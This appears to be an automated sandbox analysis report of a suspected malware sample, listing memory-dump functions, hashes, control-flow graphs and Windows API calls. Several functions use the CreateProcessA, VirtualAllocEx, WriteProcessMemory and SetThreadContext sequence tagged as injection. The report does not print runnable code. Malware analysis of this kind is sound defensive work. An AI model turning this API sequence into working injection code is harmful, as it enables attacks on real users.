                                            • Opcode Fuzzy Hash: 78bc2ed3cc3d9452b935f3bcfa86788320c94fd706942aa6f4145162555264a4
                                            • Instruction Fuzzy Hash: 81E2B434A102199FCB64DF69C894AD9B7B2FF89300F5181EAD809AB351DB31AEC5CF44
                                            Function 05417BB8 Relevance: 3.7, Strings: 2, Instructions: 1173COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 634 5417bb8-5417bf3 636 5417bf5 634->636 637 5417bfa-5417c6f 634->637 636->637 642 5417c79-5417c85 call 5416cfc 637->642 644 5417c8a-5417ca1 642->644 646 5417cab-5417cb7 call 5416d0c 644->646 648 5417cbc-5417d69 call 5416d0c call 541750c call 541751c 646->648 662 5417d73-5417d7f call 541752c 648->662 664 5417d84-5417e63 call 5416cfc call 541753c call 541754c call 541753c 662->664 682 5417e6d-5417e79 call 541755c 664->682 684 5417e7e-5417ea8 682->684 687 5417eb3-5417ec7 call 541756c 684->687 689 5417ecc-5417eee 687->689 690 5417ef9-5417f0d call 541757c 689->690 692 5417f12-5417f4b call 541758c 690->692 695 5417f55-5417f69 call 541759c 692->695 697 5417f6e-5418010 695->697 704 5418031-5418043 697->704 705 5418012-541801f 704->705 706 5418045-5418055 704->706 708 5418021 705->708 709 5418026-541802e 705->709 707 5418126-5418138 706->707 710 541805a-541807f 707->710 711 541813e-541814e 707->711 708->709 709->704 716 5418081 710->716 717 5418086-5418099 710->717 712 541828b-54182a4 711->712 714 5418153-5418171 712->714 715 54182aa-54182b5 712->715 718 5418173 714->718 719 5418178-5418192 714->719 720 54182ce-54182dd 715->720 716->717 721 54180a0-54180ba 717->721 722 541809b 717->722 718->719 725 5418194 719->725 726 5418199-54181ac 719->726 723 54182b7-54182cb 720->723 724 54182df-541831f call 54175ac 720->724 727 54180c1-54180da 721->727 728 54180bc 721->728 722->721 723->720 745 541832a-5418344 call 541757c 724->745 725->726 730 54181b3-54181c9 726->730 731 54181ae 726->731 734 54180e1-54180f7 727->734 735 54180dc 727->735 728->727 732 54181d0-54181e6 730->732 733 54181cb 730->733 731->730 737 54181e8 732->737 738 54181ed-5418200 732->738 733->732 739 54180f9 734->739 740 54180fe-5418114 734->740 735->734 737->738 743 5418202 738->743 744 5418207-5418217 738->744 739->740 741 5418116 740->741 742 541811b-5418123 740->742 741->742 742->707 743->744 746 5418219 744->746 747 541821e-5418238 744->747 749 5418349-54185a1 call 541758c call 541759c call 54175ac call 54175bc call 54175cc call 541757c call 541758c call 541759c call 54175ac call 54175bc call 54175cc 745->749 746->747 750 541823a 747->750 751 541823f-5418250 747->751 786 54185a6-54185ba call 541756c 749->786 750->751 752 5418252 751->752 753 5418257-5418276 751->753 752->753 756 5418278 753->756 757 541827d-5418288 753->757 756->757 757->712 788 54185bf-541872f call 541757c call 541758c call 541759c call 54175ac call 541757c call 541758c 786->788 804 5418739-5418753 call 541759c 788->804 806 5418758-5418799 804->806 809 54187a0-54187b6 806->809 810 54187c2-54187cf 809->810 811 54187d1-54187dd 810->811 812 54187f9 810->812 813 54187e7-54187ed 811->813 814 54187df-54187e5 811->814 815 54187ff-5418807 812->815 816 54187f7 813->816 814->816 817 541880d-541881d 815->817 816->815 818 5418824-541894b 817->818 819 541881f 817->819 831 5418956-5418974 818->831 819->818 832 541897f-5419243 call 54175dc call 54175ec call 541757c call 541758c call 541759c call 54175ac call 541756c call 541757c call 541758c call 541759c call 54175ac call 541757c call 541758c call 541759c call 54175ac call 541757c call 541758c call 541759c call 54175ac call 54175bc call 541757c call 541758c call 541759c call 54175ac call 541757c call 541758c call 541759c call 54175ac call 54175fc call 541760c call 54177b8 call 54177c8 * 11 call 541758c call 54177d8 831->832
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1841035781.0000000005410000.00000040.00000800.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5410000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Pp^q$d
                                            • API String ID: 0-2169010058
                                            • Opcode ID: 86d569eaa48f5f7b50abb2b21537708d0f4e40238df33ee9185be0e9783f7055
                                            • Instruction ID: ff69be775543d7a810256f559d06337067824c028fe23e8a66c1accfbf27dcfb
                                            • Opcode Fuzzy Hash: 86d569eaa48f5f7b50abb2b21537708d0f4e40238df33ee9185be0e9783f7055
                                            • Instruction Fuzzy Hash: BEC2A434A102198FDB64DF69C894AD9B7B2FF89301F5185EAD4096B360EB31AEC5CF40
                                            Function 07A7EC89 Relevance: .0, Instructions: 23COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea69957f29326103308f7c3f0789665ddb4adaa7aa0541dd33a48a162e7e3f0d
                                            • Instruction ID: 386c7d96a4d63b5296c723e2bb1078c5380b24d9db5bbc95f9f6f4ca61f27a35
                                            • Opcode Fuzzy Hash: ea69957f29326103308f7c3f0789665ddb4adaa7aa0541dd33a48a162e7e3f0d
                                            • Instruction Fuzzy Hash: 15E01AB481D384CBC740DB249C545B8BFB96F4B311F0422E5C82AEB253DA209844CB00
                                            Function 07A7EBDA Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8c482d281e6c7a0ef3fb09aaf439cb2af9b93294b235932dff2a48aba3902fe9
                                            • Instruction ID: 83b404f87b56aa4e6ce84ea330e1079fbe145b93ff3d8b65718fb51d3bf3e3aa
                                            • Opcode Fuzzy Hash: 8c482d281e6c7a0ef3fb09aaf439cb2af9b93294b235932dff2a48aba3902fe9
                                            • Instruction Fuzzy Hash: 3BD09EB4C1D254CBCB94DF54DC845B8BBBCAB4F711F1021A5D42AA7312D6709885CA04
                                            Function 07A7B908 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 953 7a7b908-7a7b95b 956 7a7b95d-7a7b969 953->956 957 7a7b96b-7a7b99b Wow64SetThreadContext 953->957 956->957 959 7a7b9a4-7a7b9d4 957->959 960 7a7b99d-7a7b9a3 957->960 960->959
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A7B98E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID: R
                                            • API String ID: 983334009-1466425173
                                            • Opcode ID: 068dac1f92ca06bfa3ee86c241e431bfe7bd796a61ffb7a95daef45c72eba7c0
                                            • Instruction ID: 0f10f07478d28c6dbcce37062ce2c3522d89193f6145b7dea5bdc4086e6b2b46
                                            • Opcode Fuzzy Hash: 068dac1f92ca06bfa3ee86c241e431bfe7bd796a61ffb7a95daef45c72eba7c0
                                            • Instruction Fuzzy Hash: 90216DB1D003098FDB10DFAAC8457EEBBF4EF88314F148429D469A7241C7789945CFA5
                                            Function 07A7B9E1 Relevance: 3.1, APIs: 2, Instructions: 85memorythreadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 964 7a7b9e1-7a7b9e4 965 7a7b9e6-7a7ba63 VirtualAllocEx 964->965 966 7a7b97e-7a7b99b Wow64SetThreadContext 964->966 975 7a7ba65-7a7ba6b 965->975 976 7a7ba6c-7a7ba91 965->976 968 7a7b9a4-7a7b9d4 966->968 969 7a7b99d-7a7b9a3 966->969 969->968 975->976
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A7B98E
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A7BA56
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: AllocContextThreadVirtualWow64
                                            • String ID:
                                            • API String ID: 2727713192-0
                                            • Opcode ID: 693e5a28a8600de88639e72002437a356af780934635f0d6ae5db2abee70adf1
                                            • Instruction ID: b39c3ae42a4c2524c1aa69b1c2eeb9e8ea04a847a9fe903dd6499ef47b031c94
                                            • Opcode Fuzzy Hash: 693e5a28a8600de88639e72002437a356af780934635f0d6ae5db2abee70adf1
                                            • Instruction Fuzzy Hash: 10318CB28003498FCB10DFA9C8057EEBFF5EF88324F14841AD569A7250C7399955CFA1
                                            Function 07A7BD24 Relevance: 1.8, APIs: 1, Instructions: 251processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1247 7a7bd24-7a7bdc5 1250 7a7bdc7-7a7bdd1 1247->1250 1251 7a7bdfe-7a7be1e 1247->1251 1250->1251 1252 7a7bdd3-7a7bdd5 1250->1252 1256 7a7be57-7a7be86 1251->1256 1257 7a7be20-7a7be2a 1251->1257 1254 7a7bdd7-7a7bde1 1252->1254 1255 7a7bdf8-7a7bdfb 1252->1255 1258 7a7bde5-7a7bdf4 1254->1258 1259 7a7bde3 1254->1259 1255->1251 1267 7a7bebf-7a7bf79 CreateProcessA 1256->1267 1268 7a7be88-7a7be92 1256->1268 1257->1256 1260 7a7be2c-7a7be2e 1257->1260 1258->1258 1261 7a7bdf6 1258->1261 1259->1258 1262 7a7be51-7a7be54 1260->1262 1263 7a7be30-7a7be3a 1260->1263 1261->1255 1262->1256 1265 7a7be3e-7a7be4d 1263->1265 1266 7a7be3c 1263->1266 1265->1265 1269 7a7be4f 1265->1269 1266->1265 1279 7a7bf82-7a7c008 1267->1279 1280 7a7bf7b-7a7bf81 1267->1280 1268->1267 1270 7a7be94-7a7be96 1268->1270 1269->1262 1272 7a7beb9-7a7bebc 1270->1272 1273 7a7be98-7a7bea2 1270->1273 1272->1267 1274 7a7bea6-7a7beb5 1273->1274 1275 7a7bea4 1273->1275 1274->1274 1276 7a7beb7 1274->1276 1275->1274 1276->1272 1290 7a7c00a-7a7c00e 1279->1290 1291 7a7c018-7a7c01c 1279->1291 1280->1279 1290->1291 1292 7a7c010 1290->1292 1293 7a7c01e-7a7c022 1291->1293 1294 7a7c02c-7a7c030 1291->1294 1292->1291 1293->1294 1295 7a7c024 1293->1295 1296 7a7c032-7a7c036 1294->1296 1297 7a7c040-7a7c044 1294->1297 1295->1294 1296->1297 1300 7a7c038 1296->1300 1298 7a7c056-7a7c05d 1297->1298 1299 7a7c046-7a7c04c 1297->1299 1301 7a7c074 1298->1301 1302 7a7c05f-7a7c06e 1298->1302 1299->1298 1300->1297 1304 7a7c075 1301->1304 1302->1301 1304->1304
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A7BF66
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 1ddabfd6e126ce17cdbf42b6536ea331e2cb85039dcf1f88b55c622dcaf07890
                                            • Instruction ID: 1e8e5fd769f7a0c75eefeaccb84c3ce23cfb2e16920024fb70a04b1f8f39ba1f
                                            • Opcode Fuzzy Hash: 1ddabfd6e126ce17cdbf42b6536ea331e2cb85039dcf1f88b55c622dcaf07890
                                            • Instruction Fuzzy Hash: 0CA13AF1D0021ADFDB14CF69CC41BEEBBB6AF48314F1481A9D859A7240DB749985CFA2
                                            Function 07A7BD30 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1305 7a7bd30-7a7bdc5 1307 7a7bdc7-7a7bdd1 1305->1307 1308 7a7bdfe-7a7be1e 1305->1308 1307->1308 1309 7a7bdd3-7a7bdd5 1307->1309 1313 7a7be57-7a7be86 1308->1313 1314 7a7be20-7a7be2a 1308->1314 1311 7a7bdd7-7a7bde1 1309->1311 1312 7a7bdf8-7a7bdfb 1309->1312 1315 7a7bde5-7a7bdf4 1311->1315 1316 7a7bde3 1311->1316 1312->1308 1324 7a7bebf-7a7bf79 CreateProcessA 1313->1324 1325 7a7be88-7a7be92 1313->1325 1314->1313 1317 7a7be2c-7a7be2e 1314->1317 1315->1315 1318 7a7bdf6 1315->1318 1316->1315 1319 7a7be51-7a7be54 1317->1319 1320 7a7be30-7a7be3a 1317->1320 1318->1312 1319->1313 1322 7a7be3e-7a7be4d 1320->1322 1323 7a7be3c 1320->1323 1322->1322 1326 7a7be4f 1322->1326 1323->1322 1336 7a7bf82-7a7c008 1324->1336 1337 7a7bf7b-7a7bf81 1324->1337 1325->1324 1327 7a7be94-7a7be96 1325->1327 1326->1319 1329 7a7beb9-7a7bebc 1327->1329 1330 7a7be98-7a7bea2 1327->1330 1329->1324 1331 7a7bea6-7a7beb5 1330->1331 1332 7a7bea4 1330->1332 1331->1331 1333 7a7beb7 1331->1333 1332->1331 1333->1329 1347 7a7c00a-7a7c00e 1336->1347 1348 7a7c018-7a7c01c 1336->1348 1337->1336 1347->1348 1349 7a7c010 1347->1349 1350 7a7c01e-7a7c022 1348->1350 1351 7a7c02c-7a7c030 1348->1351 1349->1348 1350->1351 1352 7a7c024 1350->1352 1353 7a7c032-7a7c036 1351->1353 1354 7a7c040-7a7c044 1351->1354 1352->1351 1353->1354 1357 7a7c038 1353->1357 1355 7a7c056-7a7c05d 1354->1355 1356 7a7c046-7a7c04c 1354->1356 1358 7a7c074 1355->1358 1359 7a7c05f-7a7c06e 1355->1359 1356->1355 1357->1354 1361 7a7c075 1358->1361 1359->1358 1361->1361
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A7BF66
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 35ffa6a078d5afaaba3541f34bd5f2785679358bf8ba9ff21c3420712349ca96
                                            • Instruction ID: 0d5e07191824edc89ed7f1c48b22770d0daf2e9f30651d663a756f27039a4651
                                            • Opcode Fuzzy Hash: 35ffa6a078d5afaaba3541f34bd5f2785679358bf8ba9ff21c3420712349ca96
                                            • Instruction Fuzzy Hash: BA913BF1D0021ADFDB14DF69CC41BAEBBB6BF48314F1481A9D819A7240DB749985CFA2
                                            Function 013FAE30 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1362 13fae30-13fae3f 1363 13fae6b-13fae6f 1362->1363 1364 13fae41-13fae4e call 13f9838 1362->1364 1366 13fae83-13faec4 1363->1366 1367 13fae71-13fae7b 1363->1367 1371 13fae64 1364->1371 1372 13fae50 1364->1372 1373 13faec6-13faece 1366->1373 1374 13faed1-13faedf 1366->1374 1367->1366 1371->1363 1417 13fae56 call 13fb0b9 1372->1417 1418 13fae56 call 13fb0c8 1372->1418 1373->1374 1375 13faf03-13faf05 1374->1375 1376 13faee1-13faee6 1374->1376 1381 13faf08-13faf0f 1375->1381 1378 13faee8-13faeef call 13fa814 1376->1378 1379 13faef1 1376->1379 1377 13fae5c-13fae5e 1377->1371 1380 13fafa0-13fb060 1377->1380 1385 13faef3-13faf01 1378->1385 1379->1385 1412 13fb068-13fb093 GetModuleHandleW 1380->1412 1413 13fb062-13fb065 1380->1413 1382 13faf1c-13faf23 1381->1382 1383 13faf11-13faf19 1381->1383 1386 13faf25-13faf2d 1382->1386 1387 13faf30-13faf39 call 13fa824 1382->1387 1383->1382 1385->1381 1386->1387 1393 13faf3b-13faf43 1387->1393 1394 13faf46-13faf4b 1387->1394 1393->1394 1395 13faf4d-13faf54 1394->1395 1396 13faf69-13faf6d 1394->1396 1395->1396 1398 13faf56-13faf66 call 13fa834 call 13fa844 1395->1398 1399 13faf73-13faf76 1396->1399 1398->1396 1402 13faf99-13faf9f 1399->1402 1403 13faf78-13faf96 1399->1403 1403->1402 1414 13fb09c-13fb0b0 1412->1414 1415 13fb095-13fb09b 1412->1415 1413->1412 1415->1414 1417->1377 1418->1377
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 013FB086
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1835829616.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13f0000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 89c5dd684cb95271bf5f232b682e3efbc715c414a6300bf9da8137872ec43bc7
                                            • Instruction ID: a0bf4ddef46150862e4db7293f682af4344bb675f142afb1acdfec63b42a1446
                                            • Opcode Fuzzy Hash: 89c5dd684cb95271bf5f232b682e3efbc715c414a6300bf9da8137872ec43bc7
                                            • Instruction Fuzzy Hash: 1A7136B0A00B058FD724DF69D48475ABBF1FF88308F10892DE58ADBA50DB75E949CB91
                                            Function 05410BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                            Download Yara Rule
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 05414381
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1841035781.0000000005410000.00000040.00000800.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5410000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: e15acf8eed6e4e61b59c674d0d461e5beb7c32e37f1401f5da5aaa060d64c19b
                                            • Instruction ID: 6f9de0c2a52fc1f5763c42c36e8554ccdc3a4ea09a919b6d67798c13ed847442
                                            • Opcode Fuzzy Hash: e15acf8eed6e4e61b59c674d0d461e5beb7c32e37f1401f5da5aaa060d64c19b
                                            • Instruction Fuzzy Hash: 4E413BB4A003098FCB14DF99C488AAABBF5FF88314F24C45AD519AB361D774A841CBA4
                                            Function 013F449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 013F59C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1835829616.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13f0000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 891820ab5b16b196a8db60d1fb19ea0129fffe8f704f537fc3be83542eba8529
                                            • Instruction ID: ab54ad5153d0e4ab770a8ac507814a3ce4657d040ae7cc187e95ef2c130d2410
                                            • Opcode Fuzzy Hash: 891820ab5b16b196a8db60d1fb19ea0129fffe8f704f537fc3be83542eba8529
                                            • Instruction Fuzzy Hash: 5341DFB0C0071DCBDF28DFA9C884B9EBBB5BF49304F20806AD509AB251DB756949CF90
                                            Function 013F590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 013F59C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1835829616.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13f0000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 5f7da64ba10891fb0b55f40dc8a4bd976be1d2b43a67e7207ed6c1c939163bd7
                                            • Instruction ID: 53dd5441bab8366eb7eec08b8d486adffbfde8bc46e27db5dd9ea5e4bd46fd70
                                            • Opcode Fuzzy Hash: 5f7da64ba10891fb0b55f40dc8a4bd976be1d2b43a67e7207ed6c1c939163bd7
                                            • Instruction Fuzzy Hash: DE41E2B0C00719CEDF29CFA9C885BDEBBB5BF49304F20806AD509AB255DB756949CF90
                                            Function 07A7BAA1 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A7BB38
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 27887fcf947e6bc1e1a82edcd48f36fcecefe265678a1d77a7428f9d39ff2d32
                                            • Instruction ID: cac500693961b0baea50e82063c8e7ed2fb75b95b9db197352b07fc7e11cedb1
                                            • Opcode Fuzzy Hash: 27887fcf947e6bc1e1a82edcd48f36fcecefe265678a1d77a7428f9d39ff2d32
                                            • Instruction Fuzzy Hash: DA2169B19003499FCB10CFA9C885BEEBFF5FF88310F10842AE959A7241C7789955CBA4
                                            Function 07A7BAA8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A7BB38
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: dff6dfc7fc9a9ea020ce2e150a060a9541d2a3839827452f5079d41ca87f1573
                                            • Instruction ID: ca97b819423bb7cc51d53f3fbc11092c2cff68c0c731ac8d7253129f5904255d
                                            • Opcode Fuzzy Hash: dff6dfc7fc9a9ea020ce2e150a060a9541d2a3839827452f5079d41ca87f1573
                                            • Instruction Fuzzy Hash: 2A214AB19003099FCB10DFA9C885BDEBBF5FF88310F10842AE919A7340C7789955CBA4
                                            Function 013FC9A0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,013FD2C6,?,?,?,?,?), ref: 013FD387
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1835829616.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13f0000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: cd2d24a9146fd1de14f603017b382b05ca5e3d28738d7613b824683ce9e43daf
                                            • Instruction ID: a14c55df5a4a458e119bcf576635760b5e47d47903cf347b2eab3a24a7ccb03b
                                            • Opcode Fuzzy Hash: cd2d24a9146fd1de14f603017b382b05ca5e3d28738d7613b824683ce9e43daf
                                            • Instruction Fuzzy Hash: B121E6B59003089FDB10CF9AD984ADEBFF5EB48314F14841AEA58A7350D374A954CFA5
                                            Function 07A7BB90 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A7BC18
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 296b96ae6c2fa3c210aa0a7a622f63f28c721f071c9e53fc51071fa2cf21aef1
                                            • Instruction ID: 008963673a23fcdd23978446ed81d6c83a8695f85198a15ea06b5009e3c2d4a9
                                            • Opcode Fuzzy Hash: 296b96ae6c2fa3c210aa0a7a622f63f28c721f071c9e53fc51071fa2cf21aef1
                                            • Instruction Fuzzy Hash: DF2136B19003499FCB10CFA9C885AEEFBF1FF88310F50842EE518A7240C7389955CBA4
                                            Function 07A7BB98 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A7BC18
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: cb1f39a8c8ae81b6fbfa33052c4e29074584023dd88e88f7b45bd78b3d74fa96
                                            • Instruction ID: 5a26ffb1cfcbe6eac2c8ef7e9fa0e13bf2dede43a1af966e86de3b935d09f9e4
                                            • Opcode Fuzzy Hash: cb1f39a8c8ae81b6fbfa33052c4e29074584023dd88e88f7b45bd78b3d74fa96
                                            • Instruction Fuzzy Hash: 042139B1D003499FCB10DFAAC845AEEFBF5FF88310F50842AE519A7240C7389955DBA4
                                            Function 07A7B910 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A7B98E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 1c415146ffc6740f0cf9471a8249d61fa27cb0aa8a3581ad8b57a6db4244a128
                                            • Instruction ID: 0e1ddfc29a5506013a220f53c6e3e83b3e0d72b11d42b9f754a43c1f4e61b299
                                            • Opcode Fuzzy Hash: 1c415146ffc6740f0cf9471a8249d61fa27cb0aa8a3581ad8b57a6db4244a128
                                            • Instruction Fuzzy Hash: 29211AB19003098FDB10DFAAC4857EEBBF4EF88314F148429D569A7241D7789945CFA5
                                            Function 013FD2F9 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,013FD2C6,?,?,?,?,?), ref: 013FD387
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1835829616.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13f0000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 198dea39cef55b31314657cbd2dd1127b2c1c332b3eb289d4971cae7871d5dc7
                                            • Instruction ID: 40a050fd01f9642f39474c6240a746d5283b9e7621ee9d071b54de5d836e8c03
                                            • Opcode Fuzzy Hash: 198dea39cef55b31314657cbd2dd1127b2c1c332b3eb289d4971cae7871d5dc7
                                            • Instruction Fuzzy Hash: 4C2112B5D003089FDB10CFA9D584ADEBBF5FB48310F10841AE918A3310C338A954CFA0
                                            Function 013FA870 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013FB101,00000800,00000000,00000000), ref: 013FB312
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1835829616.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13f0000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
